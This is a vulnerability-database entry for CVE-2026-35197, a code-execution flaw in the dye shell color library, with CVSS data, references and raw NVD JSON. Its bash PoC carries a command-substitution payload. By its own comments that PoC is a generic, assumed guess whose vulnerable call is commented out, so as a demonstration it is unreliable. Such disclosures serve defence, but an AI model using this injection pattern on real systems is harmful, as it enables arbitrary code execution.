Security Vulnerability Report
CVE-2026-35197 CVSS 6.6 MEDIUM

CVE-2026-35197

Published: 2026-04-06 20:16:27
Last Modified: 2026-04-16 04:13:43

Description

dye is a portable and respectful color library for shell scripts. Prior to 1.1.1, certain dye template expressions would result in execution of arbitrary code. This issue was discovered and fixed by dye's author, and is not known to be exploited. This vulnerability is fixed in 1.1.1.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mattiebee:dye:1.1.0:*:*:*:*:*:*:* - VULNERABLE
dye < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35197 (dye < 1.1.1)
# This script demonstrates how a malicious template expression
# could trigger arbitrary code execution.

# Assume 'dye' is installed or sourced in the environment
# source dye.sh

echo "[+] Testing CVE-2026-35197 Arbitrary Code Execution in dye"

# Vulnerable context: Passing untrusted input to dye's template engine
# In versions < 1.1.1, specific syntax (e.g., backticks or command substitution)
# within template expressions might be evaluated by the shell.

# Example payload: Create a file as proof of execution
MALICIOUS_PAYLOAD="\$(touch /tmp/dye_pwned.txt)"

# Simulating the vulnerable function call
# (Actual syntax depends on library implementation, assuming a generic template usage)
# If the library passes the argument directly to 'eval' or similar, execution occurs.
echo "[+] Attempting to execute payload: $MALICIOUS_PAYLOAD"

# In a real vulnerable scenario, this line would trigger the command:
# dye -p "$MALICIOUS_PAYLOAD"

# Verification
if [ -f /tmp/dye_pwned.txt ]; then
    echo "[!] SUCCESS: Arbitrary code executed. File /tmp/dye_pwned.txt created."
    rm /tmp/dye_pwned.txt
else
    echo "[-] FAILED: Exploit did not trigger (library may be patched)."
fi

References

https://github.com/mattieb/dye/security/advisories/GHSA-3v4r-5vfh-3wjr (Vendor Advisory)
https://mattiebee.io/dye-template-advisory (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35197", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:27.380", "lastModified": "2026-04-16T04:13:42.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "dye is a portable and respectful color library for shell scripts. Prior to 1.1.1, certain dye template expressions would result in execution of arbitrary code. This issue was discovered and fixed by dye's author, and is not known to be exploited. This vulnerability is fixed in 1.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattiebee:dye:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F287B375-FA78-48A2-9AB8-646B70D81484"}]}]}], "references": [{"url": "https://github.com/mattieb/dye/security/advisories/GHSA-3v4r-5vfh-3wjr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, 
{"url": "https://mattiebee.io/dye-template-advisory", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}